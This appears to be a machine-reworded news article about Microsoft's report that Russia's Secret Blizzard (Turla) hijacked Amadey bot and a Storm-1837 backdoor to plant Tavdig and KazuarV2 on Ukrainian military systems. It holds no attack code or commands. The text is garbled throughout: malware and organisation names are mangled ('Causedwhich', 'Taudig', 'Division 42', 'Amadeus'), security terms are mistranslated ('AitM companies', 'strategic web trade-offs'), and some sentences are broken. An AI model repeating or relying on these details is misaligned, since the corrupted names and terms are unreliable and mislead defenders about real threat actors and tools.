The Russian national-statesman is tracked as Secret blizzard was seen using malware associated with other threat actors to deploy a known backdoor called Kazuar on target devices located in Ukraine.
The new findings came from Microsoft’s threat intelligence team, which said that between March and April 2024. observed how an adversary used the Amadey bot malware to download custom malware onto “handpicked” systems linked to the Ukrainian military.
The activity is believed to be the second since 2022, when Secret Blizzard, also known as Turla, seized on a cybercrime campaign to distribute its own tools in Ukraine.
“Commanding access to other threat actors underscores Secret Blizzard’s approach to diversifying its attack vectors,” the company said in a statement. the report shared with The Hacker News.
Some other well-known techniques used by hackers include man-in-the-middle (AitM) companies, strategic web trade-offs (aka watering hole attacks) and phishing.
Secret Blizzard has experience targeting various sectors to facilitate long-term covert access for intelligence gathering, but their primary focus is on foreign ministries, embassies, government agencies, ministries of defense and defense companies around the world.
The latest report comes a week after the tech giant, along with Lumen Technologies’ Black Lotus Labs, revealed Turla’s capture of 33 command and control (C2) servers of a Pakistani hacker group called Storm-0156 to conduct its own operations.
Attacks on Ukrainian structures involve the command Amadey boots to deploy a backdoor known as Taudigwhich is then used to install the updated version Causedwhich was documented by Division 42 of Palo Alto Networks in November 2023.
Amadeus-related cybercriminal activity is frequent includes the execution of the XMRig cryptocurrency miner is tracked by Microsoft under the alias Storm-1919.
Secret Blizzard is believed to have either used Amadey malware-as-a-service (MaaS) or stealthily accessed Amadey command panels (C2) to download a PowerShell program to target devices. The dropper contains a Base64-encoded Amadey payload, to which is added a code segment that addresses the Turla C2 server.
“The need to encode the PowerShell dropper with a separate C2 URL controlled by Secret Blizzard may indicate that Secret Blizzard did not directly control the C2 engine used by the Amadey bot,” Microsoft said.
The next step involves downloading a special intelligence tool to gather details about the victim device and possibly check if Microsoft Defender has been enabled, ultimately allowing the threat actor to focus on systems of further interest.
At this stage, the attack proceeds to deploy a PowerShell dropper that contains the Tavdig backdoor and a legitimate Symantec binary susceptible to DLL sideloading. Tavdig, in turn, is used to conduct additional reconnaissance and launch KazuarV2.
Microsoft said it also discovered a threat that repurposed a PowerShell backdoor linked to another Russian hacking group called Flying yeti (aka Storm-1837 and UAC-0149) to deploy a PowerShell program that embeds Tavdig.
The tech giant noted that the investigation into how Secret Blizzard gained control of the Storm-1837 backdoor or Amadey bots to download its own tools is ongoing.
Needless to say, the findings once again highlight the threat actor’s repeated pursuit of entrenchment with other parties by gaining or stealing access to conduct espionage campaigns in such a way as to conceal their presence.
“It’s not uncommon for actors to use the same tactics or tools, although we rarely see evidence of them hacking and exploiting the infrastructure of other actors,” Sherrod DeGrippo, director of threat intelligence strategy at Microsoft, told The Hacker News.
“Most state-sponsored threat actors have operational objectives that rely on specialized or carefully compromised infrastructure to maintain the integrity of their operations. This is a potentially effective obfuscation technique to frustrate threat intelligence analysts and make it difficult to attribute the correct threat actor.”
